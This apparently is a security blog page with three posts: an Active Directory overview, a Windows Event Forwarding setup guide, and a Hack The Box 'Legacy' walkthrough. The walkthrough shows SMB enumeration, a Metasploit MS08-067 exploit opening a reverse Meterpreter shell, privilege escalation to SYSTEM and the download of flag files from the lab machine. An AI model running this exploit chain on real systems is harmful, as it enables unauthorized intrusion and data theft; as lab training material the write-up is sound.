Attacking and Defending Active Directory Part I

Introduction

Microsoft Active Directory is one of the most interesting services to attack since we can gather a lot of information just by checking if the server is misconfigured which enables us to enumerate treasure trove of information like Domain Users, Administrative Shares, Password Policies and many more.

In this series, I will be separating this into three parts. The first part will include the introduction of Active Directory and its components.

The second part will include different types of attacks against Active Directory and the demonstration on how to execute these attacks.

And lastly, we’ll be covering different approaches in defending and reducing attack surfaces of Active Directory.

What is Active Directory?

Active Directory or AD is a centralized Windows OS directory service that stores information about objects on the network and automates the management of user data, security, and distributed resources.

Active Directory Components

Just to give you an overview of the different components of Active Directory, the Active Directory consists of:

  • Domains
  • Forests
  • Sites
  • Domain Controllers
  • Organizational Units (OU)

Each of these components has their own purpose that enables Active Directory to function within an organization.

I will just summarize the meanings and functions of these components but you can read more about Active Directory on the official documentation of Microsoft.

Domains

Active Directory domains are where the users and computers are located. Each domain holds a database that contains the information of an object’s identity.

For example, I have an AD domain called internal.anotsodev.org. This domain contains all the information of users and computers joined in this domain.

Forests

Active Directory forests are the topmost logical containers of the hierarchy. The illustration below shows the organizational domain forest model of internal.anotsodev.org.

Sites

Active Directory Domain Sites enables the users to authenticate with the nearest domain controller and provides domain preference either administrative or least privilege to the current logged in user.

Sites are organized by one or more IP subnets based on the geographic location of the domain users joined to a domain.

Domain Controllers

Active Directory Domain Controllers handles authentication requests and verifies users if they have access to domain resources. Domain Users’ preference and permissions are defined via group policy set to the Domain Controller.

Organizational Unit (OU)

An organizational unit (OU) is a subdivision within an Active Directory into which you can place users, groups, computers, and other organizational units. You can create organizational units to mirror your organization’s functional or business structure. Each domain can implement its own organizational unit hierarchy. If your organization contains several domains, you can create organizational unit structures in each domain that are independent of the structures in the other domains.


So that ends the first part of the “Attacking and Defending Active Directory” series.

I will be posting the second part of this series which is the actual attacks that are being used against active directories next week.

Stay tuned and be safe!

References:


Subscribe for more!

To stay up to date with my latest posts and more InfoSec guides, make sure to subscribe to this blog by entering your email address below.

I promise I won’t be spamming your mailbox. Because no one loves spam. AMIRIGHT?

Poor man’s log collection on Windows

Introduction

As your organization grows, a lot more log collectors either commercial or freeware are needed to be installed on your network to get logs from different servers running on Windows or *nix.

Let’s say for example this organization called kyle.biz has implemented Arcsight SmartConnectors deployed on Linux servers to get event logs on Windows. And based on my experience, setting up the SmartConnectors is tedious and maintaining them is sometimes a pain.

The limitations were also realized since SmartConnector only gets logs on the server static IPs configured during the installation so there is no way we’ll get the logs from other machines that have dynamic IPs.

Upon research, our team has stumbled upon this article from Microsoft’s documentation page and saw that Windows has already built-in log forwarding feature which is powerful and easy to configure!

So without further ado, let’s now configure the Source Initiated WEC and WEF on our servers! 

Prerequisites

Windows Event Collector

  • OS: Windows Server 2016 
  • Hostname: WEC01.internal.kyle.biz
  • RAM: 16GB
  • CPU: 4 Cores
  • Storage:
    • Drive C:\ – 50GB
    • Drive D:\ – 60GB (we’ll save our forwarded logs here)
  • Joined in a domain.

Windows Event Source

  • OS: Windows Server 2016
  • Hostname: CONSOLESERVER01.internal.kyle.biz
  • Joined in a domain.

WEC Server Configuration

On the following steps, we’ll be configuring our collector server to receive logs which will be initiated by source computers.

Step 1: Open the Event Viewer and click the Subscription.

Step 2: Right-click the Subscription to create a new Subscription. You can also see other actions on the right pane of the window.

Step 3: Enter the subscription name and select the subscription type as Source computer initiated.

Before we proceed in adding computer groups, let’s first configure the events to collect and advanced settings.

Step 4: Click the Select Events then click the manual edit/XML tab then copy the XML format query here: Appendix E – Annotated baseline subscription event query

Step 5: Click OK

Step 6: Click the Advanced Settings then select Minimize Latency.

Step 7: Click OK

Step 8: We’ll now add our domain computers by clicking Select Computer Groups.

Step 9: Since we are joined in a domain, click Add Domain Computers then search for the hostname of the event source. (Ex: CONSOLESERVER01.internal.kyle.biz)

Step 10: Click OK

Step 11: Right-click the Forwarded Events then click on properties

Step 12: Create folder Winenvt\Logs on drive D:\ then replace the log path by entering D:\Winevt\Logs\ForwardedEvents.evtx or refer to the screenshot below.

Event Source Configuration

On the following steps, we’ll be configuring the source computers to forward logs to our collector server.

Step 1: Let’s now configure our event source server machine to point the SubscriptionManagers to our WEC.

Step 2: Open the Local Group Policy then click the Event Forwarding to see the items under that directory.

Step 3: Click the Configure target Subscription Manager and enter on the value

"Server=http://WEC01.internal.kyle.biz.org:5985/wsman/SubscriptionManager/WEC,Refresh=60"

Step 4: Click OK

Step 5: Open Command Prompt then enter gpudate /force to apply the modification in our local group policy.

Step 6: Press Enter

Step 7: Go back to the WEC server then check if the Baseline events already getting logs from our event source machine.

Step 8: We can already see that the events are already forwarded and ready to use for analysis.

So that’s it! I hope you learned something new today and I hope you’ll be using this example to reduce the gap and have greater visibility on your network.

References:


Subscribe for more!

To stay up to date with my latest posts and more InfoSec guides, make sure to subscribe to this blog by entering your email address below.

I promise I won’t be spamming your mailbox. Because no one loves spam. AMIRIGHT?

Hack the Box Legacy Get System no Jutsu

This post contains the actual commands that I used in hacking and getting the user and root hashes on HTB Legacy Box.

Enumeration

kaipowered@debian:~/Downloads/enum4linux-0.8.9/enum4linux-0.8.9$ sudo ./enum4linux.pl -a 10.10.10.4
[sudo] password for kaipowered:
WARNING: ldapsearch is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jul 18 22:42:06 2017

==========================
| Target Information |
==========================
Target ........... 10.10.10.4
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none




==================================================
| Enumerating Workgroup/Domain on 10.10.10.4 |
==================================================
[+] Got domain/workgroup name: HTB

==========================================
| Nbtstat Information for 10.10.10.4 |
==========================================
Looking up status of 10.10.10.4
LEGACY <00> - B <ACTIVE> Workstation Service
HTB <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
LEGACY <20> - B <ACTIVE> File Server Service
HTB <1e> - <GROUP> B <ACTIVE> Browser Service Elections
HTB <1d> - B <ACTIVE> Master Browser
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser

MAC Address = 00-50-56-97-0E-E1

===================================
| Session Check on 10.10.10.4 |
===================================
[+] Server 10.10.10.4 allows sessions using username '', password ''

=========================================
| Getting domain SID for 10.10.10.4 |
=========================================
could not initialise lsa pipe. Error was NT_STATUS_ACCESS_DENIED
could not obtain sid from server
error: NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup

====================================
| OS information on 10.10.10.4 |
====================================
[+] Got OS info for 10.10.10.4 from smbclient: Domain=[LEGACY] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
[E] Can't get OS info with srvinfo: NT_STATUS_ACCESS_DENIED

===========================
| Users on 10.10.10.4 |
===========================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

=======================================
| Share Enumeration on 10.10.10.4 |
=======================================
[E] Can't list shares: NT_STATUS_ACCESS_DENIED

[+] Attempting to map shares on 10.10.10.4

==================================================
| Password Policy Information for 10.10.10.4 |
==================================================
[E] Unexpected error from polenum.py:
Traceback (most recent call last):
File "/usr/local/bin/polenum.py", line 32, in <module>
from impacket import uuid
ImportError: No module named impacket
[E] Failed to get password policy with rpcclient




============================
| Groups on 10.10.10.4 |
============================

[+] Getting builtin groups:
[E] Can't get builtin groups: NT_STATUS_ACCESS_DENIED

[+] Getting builtin group memberships:

[+] Getting local groups:
[E] Can't get local groups: NT_STATUS_ACCESS_DENIED

[+] Getting local group memberships:

[+] Getting domain groups:
[E] Can't get domain groups: NT_STATUS_ACCESS_DENIED

[+] Getting domain group memberships:

=====================================================================
| Users on 10.10.10.4 via RID cycling (RIDS: 500-550,1000-1050) |
=====================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.

===========================================
| Getting printer info for 10.10.10.4 |
===========================================
could not initialise lsa pipe. Error was NT_STATUS_ACCESS_DENIED
could not obtain sid from server
error: NT_STATUS_ACCESS_DENIED



enum4linux complete on Tue Jul 18 22:42:49 2017

Exploitation and Post Exploitation

msf exploit(ms06_040_netapi) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)




Exploit target:

Id Name
-- ----
0 Automatic Targeting




msf exploit(ms08_067_netapi) > set RHOST 10.10.10.4
RHOST => 10.10.10.4
msf exploit(ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.15.172:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (956991 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.15.172:4444 -> 10.10.10.4:1028) at 2017-07-18 22:26:33 +0800

meterpreter > sysinfo
Computer : LEGACY
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 1512 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd c:\Users
cd c:\Users
The system cannot find the path specified.

C:\WINDOWS\system32>cd C
cd C
The system cannot find the path specified.

C:\WINDOWS\system32>cd C:\
cd C:\

C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\

16/03/2017 08:30 �� 0 AUTOEXEC.BAT
16/03/2017 08:30 �� 0 CONFIG.SYS
16/03/2017 09:07 �� <DIR> Documents and Settings
16/03/2017 08:33 �� <DIR> Program Files
16/03/2017 08:33 �� <DIR> WINDOWS
2 File(s) 0 bytes
3 Dir(s) 6.488.408.064 bytes free

C:\>cd WINDOWS
cd WINDOWS

C:\WINDOWS>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\WINDOWS

16/03/2017 08:33 �� <DIR> .
16/03/2017 08:33 �� <DIR> ..
23/07/2017 07:19 �� 0 0.log
16/03/2017 08:18 �� <DIR> addins
16/03/2017 08:19 �� <DIR> AppPatch
23/08/2001 03:00 �� 1.272 Blue Lace 16.bmp
23/08/2001 03:00 �� 82.944 clock.avi
16/03/2017 08:27 �� 200 cmsetacl.log
23/08/2001 03:00 �� 17.062 Coffee Bean.bmp
16/03/2017 08:32 �� 15.905 comsetup.log
16/03/2017 08:18 �� <DIR> Config
16/03/2017 08:18 �� <DIR> Connection Wizard
16/03/2017 08:30 �� 0 control.ini
16/03/2017 08:28 �� <DIR> Cursors
16/03/2017 08:20 �� <DIR> Debug
23/08/2001 03:00 �� 2 desktop.ini
16/03/2017 08:18 �� <DIR> Driver Cache
16/03/2017 08:28 �� 130 DtcInstall.log
16/03/2017 08:19 �� <DIR> ehome
14/04/2008 06:42 �� 1.033.728 explorer.exe
23/08/2001 03:00 �� 80 explorer.scf
16/03/2017 08:29 �� 11.537 FaxSetup.log
23/08/2001 03:00 �� 16.730 FeatherTexture.bmp
23/08/2001 03:00 �� 17.336 Gone Fishing.bmp
23/08/2001 03:00 �� 26.582 Greenstone.bmp
16/03/2017 08:29 �� <DIR> Help
14/04/2008 06:42 �� 10.752 hh.exe
16/03/2017 08:32 �� 48.335 iis6.log
16/03/2017 08:30 �� <DIR> ime
16/03/2017 08:32 �� 4.382 imsins.log
16/03/2017 08:18 �� <DIR> java
16/03/2017 08:19 �� <DIR> L2Schemas
16/03/2017 08:29 �� 1.487 MedCtrOC.log
16/03/2017 08:19 �� <DIR> Media
16/03/2017 08:19 �� <DIR> msagent
16/03/2017 08:18 �� <DIR> msapps
23/08/2001 03:00 �� 1.405 msdfmap.ini
16/03/2017 08:29 �� 871 msgsocm.log
16/03/2017 08:28 �� 10.066 msmqinst.log
16/03/2017 08:19 �� <DIR> mui
16/03/2017 08:29 �� 2.790 netfxocm.log
16/03/2017 08:19 �� <DIR> Network Diagnostic
14/04/2008 06:42 �� 69.120 NOTEPAD.EXE
16/03/2017 08:32 �� 7.948 ntdtcsetup.log
16/03/2017 08:29 �� 14.772 ocgen.log
16/03/2017 08:32 �� 885 ocmsn.log
16/03/2017 08:30 �� 4.161 ODBCINST.INI
16/03/2017 09:07 �� 1.178 OEWABLog.txt
16/03/2017 08:29 �� <DIR> Offline Web Pages
16/03/2017 08:29 �� <DIR> pchealth
16/03/2017 08:19 �� <DIR> PeerNet
23/08/2001 03:00 �� 65.954 Prairie Wind.bmp
16/03/2017 09:18 �� <DIR> Prefetch
16/03/2017 08:18 �� <DIR> Provisioning
14/04/2008 06:42 �� 146.432 regedit.exe
16/03/2017 08:30 �� <DIR> Registration
16/03/2017 08:32 �� 8.192 REGLOCS.OLD
16/03/2017 08:24 �� 1.690 regopt.log
16/03/2017 08:18 �� <DIR> repair
16/03/2017 08:18 �� <DIR> Resources
23/08/2001 03:00 �� 17.362 Rhododendron.bmp
23/08/2001 03:00 �� 26.680 River Sumida.bmp
23/08/2001 03:00 �� 65.832 Santa Fe Stucco.bmp
11/05/2017 01:31 �� 1.306 SchedLgU.Txt
16/03/2017 08:30 �� <DIR> security
16/03/2017 08:29 �� 1.022 sessmgr.setup.log
14/04/2008 08:40 �� 1.296.669 SET3.tmp
14/04/2008 08:34 �� 1.088.840 SET4.tmp
14/04/2008 08:34 �� 16.535 SET8.tmp
16/03/2017 08:32 �� 159.934 setupact.log
11/05/2017 01:31 �� 196.252 setupapi.log
16/03/2017 08:20 �� 0 setuperr.log
16/03/2017 08:33 �� 747.894 setuplog.txt
23/08/2001 03:00 �� 65.978 Soap Bubbles.bmp
16/03/2017 08:33 �� <DIR> SoftwareDistribution
16/03/2017 08:29 �� <DIR> srchasst
16/03/2017 08:22 �� 0 Sti_Trace.log
16/03/2017 08:20 �� <DIR> system
16/03/2017 08:20 �� 231 system.ini
23/07/2017 07:23 �� <DIR> system32
16/03/2017 08:32 �� 1.252 tabletoc.log
23/08/2001 03:00 �� 15.360 TASKMAN.EXE
11/05/2017 01:30 �� <DIR> Temp
16/03/2017 08:32 �� 10.801 tsoc.log
23/08/2001 03:00 �� 94.784 twain.dll
16/03/2017 08:18 �� <DIR> twain_32
14/04/2008 06:42 �� 50.688 twain_32.dll
23/08/2001 03:00 �� 49.680 twunk_16.exe
23/08/2001 03:00 �� 25.600 twunk_32.exe
16/03/2017 08:28 �� 36 vb.ini
16/03/2017 08:28 �� 37 vbaddin.ini
23/08/2001 03:00 �� 18.944 vmmreg32.dll
16/03/2017 08:29 �� <DIR> Web
16/03/2017 08:22 �� 501 wiadebug.log
16/03/2017 08:22 �� 49 wiaservc.log
16/03/2017 08:30 �� 477 win.ini
23/07/2017 07:24 �� 11.076 WindowsUpdate.log
23/08/2001 03:00 �� 256.192 winhelp.exe
14/04/2008 06:42 �� 283.648 winhlp32.exe
16/03/2017 08:20 �� <DIR> WinSxS
16/03/2017 09:07 �� 1.107 wmsetup.log
16/03/2017 08:30 �� 316.640 WMSysPr9.prx
23/08/2001 03:00 �� 9.522 Zapotec.bmp
23/08/2001 03:00 �� 707 _default.pif
68 File(s) 6.455.564 bytes
36 Dir(s) 6.488.403.968 bytes free

C:\WINDOWS>dir system
dir system
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\WINDOWS\system

16/03/2017 08:20 �� <DIR> .
16/03/2017 08:20 �� <DIR> ..
23/08/2001 03:00 �� 69.584 AVICAP.DLL
23/08/2001 03:00 �� 109.456 AVIFILE.DLL
23/08/2001 03:00 �� 32.816 COMMDLG.DLL
23/08/2001 03:00 �� 2.000 KEYBOARD.DRV
23/08/2001 03:00 �� 9.936 LZEXPAND.DLL
23/08/2001 03:00 �� 73.376 MCIAVI.DRV
23/08/2001 03:00 �� 25.264 MCISEQ.DRV
23/08/2001 03:00 �� 28.160 MCIWAVE.DRV
13/04/2008 11:24 �� 68.768 MMSYSTEM.DLL
23/08/2001 03:00 �� 1.152 MMTASK.TSK
23/08/2001 03:00 �� 2.032 MOUSE.DRV
23/08/2001 03:00 �� 126.912 MSVIDEO.DLL
23/08/2001 03:00 �� 82.944 OLECLI.DLL
23/08/2001 03:00 �� 24.064 OLESVR.DLL
23/08/2001 03:00 �� 59.167 setup.inf
23/08/2001 03:00 �� 5.120 SHELL.DLL
23/08/2001 03:00 �� 1.744 SOUND.DRV
23/08/2001 03:00 �� 5.532 stdole.tlb
23/08/2001 03:00 �� 3.360 SYSTEM.DRV
23/08/2001 03:00 �� 19.200 TAPI.DLL
23/08/2001 03:00 �� 4.048 TIMER.DRV
23/08/2001 03:00 �� 9.008 VER.DLL
23/08/2001 03:00 �� 2.176 VGA.DRV
23/08/2001 03:00 �� 13.600 WFWNET.DRV
14/04/2008 06:42 �� 146.432 WINSPOOL.DRV
25 File(s) 925.851 bytes
2 Dir(s) 6.488.403.968 bytes free

C:\WINDOWS>dir ehome
dir ehome
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\WINDOWS\ehome

16/03/2017 08:19 �� <DIR> .
16/03/2017 08:19 �� <DIR> ..
14/04/2008 06:41 �� 33.792 custsat.dll
1 File(s) 33.792 bytes
2 Dir(s) 6.488.403.968 bytes free

C:\WINDOWS>dir temp
dir temp
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\WINDOWS\temp

11/05/2017 01:30 �� <DIR> .
11/05/2017 01:30 �� <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 6.488.395.776 bytes free

C:\WINDOWS>cd ..
cd ..

C:\>cd "Documents and Settings"
cd "Documents and Settings"

C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\Documents and Settings

16/03/2017 09:07 �� <DIR> .
16/03/2017 09:07 �� <DIR> ..
16/03/2017 09:07 �� <DIR> Administrator
16/03/2017 08:29 �� <DIR> All Users
16/03/2017 08:33 �� <DIR> john
0 File(s) 0 bytes
5 Dir(s) 6.488.395.776 bytes free

C:\Documents and Settings>cd john
cd john

C:\Documents and Settings\john>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\Documents and Settings\john

16/03/2017 08:33 �� <DIR> .
16/03/2017 08:33 �� <DIR> ..
16/03/2017 09:19 �� <DIR> Desktop
16/03/2017 08:33 �� <DIR> Favorites
16/03/2017 08:33 �� <DIR> My Documents
16/03/2017 08:20 �� <DIR> Start Menu
0 File(s) 0 bytes
6 Dir(s) 6.488.395.776 bytes free

C:\Documents and Settings\john>cd Desktop
cd Desktop

C:\Documents and Settings\john\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\Documents and Settings\john\Desktop

16/03/2017 09:19 �� <DIR> .
16/03/2017 09:19 �� <DIR> ..
16/03/2017 09:19 �� 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 6.488.395.776 bytes free

C:\Documents and Settings\john\Desktop>edit user.txt
edit user.txt
^C
Terminate channel 1? [y/N] y
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd C:\Documents and Settings\john\Desktop
[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
meterpreter > cd C:
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > lpwd
/home/kaipowered/Documents/HTB
meterpreter > cd C:\
meterpreter > pwd
C:\
meterpreter > cd "Documents and Settings"
meterpreter > pwd
C:\Documents and Settings
meterpreter > cd john
meterpreter > cd Desktop
meterpreter > download user.txt
[*] Downloading: user.txt -> user.txt
[*] Downloaded 32.00 B of 32.00 B (100.0%): user.txt -> user.txt
[*] download : user.txt -> user.txt
meterpreter > pwd
C:\Documents and Settings\john\Desktop
meterpreter > cd ..
meterpreter > cd ..
meterpreter > pwd
C:\Documents and Settings
meterpreter > dir
Listing: C:\Documents and Settings
==================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-03-16 14:07:21 +0800 Administrator
40777/rwxrwxrwx 0 dir 2017-03-16 13:29:48 +0800 All Users
40777/rwxrwxrwx 0 dir 2017-03-16 13:33:37 +0800 Default User
40777/rwxrwxrwx 0 dir 2017-03-16 13:32:52 +0800 LocalService
40777/rwxrwxrwx 0 dir 2017-03-16 13:32:43 +0800 NetworkService
40777/rwxrwxrwx 0 dir 2017-03-16 13:33:42 +0800 john

meterpreter > cd Administrator
meterpreter > dir
Listing: C:\Documents and Settings\Administrator
================================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:29 +0800 Application Data
40777/rwxrwxrwx 0 dir 2017-03-16 13:32:27 +0800 Cookies
40777/rwxrwxrwx 0 dir 2017-03-16 14:18:27 +0800 Desktop
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:32 +0800 Favorites
40777/rwxrwxrwx 0 dir 2017-03-16 13:20:48 +0800 Local Settings
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:31 +0800 My Documents
100666/rw-rw-rw- 524288 fil 2017-05-11 06:31:16 +0800 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2017-07-24 00:18:53 +0800 NTUSER.DAT.LOG
40777/rwxrwxrwx 0 dir 2017-03-16 13:20:48 +0800 NetHood
40777/rwxrwxrwx 0 dir 2017-03-16 13:20:48 +0800 PrintHood
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:31 +0800 Recent
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:24 +0800 SendTo
40555/r-xr-xr-x 0 dir 2017-03-16 13:20:48 +0800 Start Menu
40777/rwxrwxrwx 0 dir 2017-03-16 13:28:41 +0800 Templates
100666/rw-rw-rw- 178 fil 2017-05-11 06:31:16 +0800 ntuser.ini

meterpreter > cd Desktop
meterpreter > dir
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 32 fil 2017-03-16 14:18:50 +0800 root.txt

meterpreter > download root.txt
[*] Downloading: root.txt -> root.txt
[*] Downloaded 32.00 B of 32.00 B (100.0%): root.txt -> root.txt
[*] download : root.txt -> root.txt
meterpreter >

 


Subscribe for more!

To stay up to date with my latest posts and more InfoSec guides, make sure to subscribe to this blog by entering your email address below.

I promise I won’t be spamming your mailbox. Because no one loves spam. AMIRIGHT?